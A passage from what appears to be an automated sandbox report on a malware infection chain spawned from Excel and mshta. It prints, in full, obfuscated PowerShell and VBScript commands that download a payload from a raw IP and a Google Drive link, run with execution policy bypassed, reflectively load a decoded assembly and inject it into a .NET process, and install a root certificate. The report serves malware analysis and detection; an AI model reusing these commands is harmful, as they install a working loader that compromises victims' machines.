ICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
                Source: Yara matchFile source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 3900, type: MEMORYSTR
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE89A0022D push eax; iretd 5_2_000007FE89A00241
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE89A000BD pushad ; iretd 5_2_000007FE89A000C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE89A00BAD push eax; ret 5_2_000007FE89A00BC1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 26_2_00402AC0 push eax; ret 26_2_00402AD4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 26_2_00402AC0 push eax; ret 26_2_00402AFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 26_2_01272E4B push cs; retf 26_2_01272E6A

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.dllJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
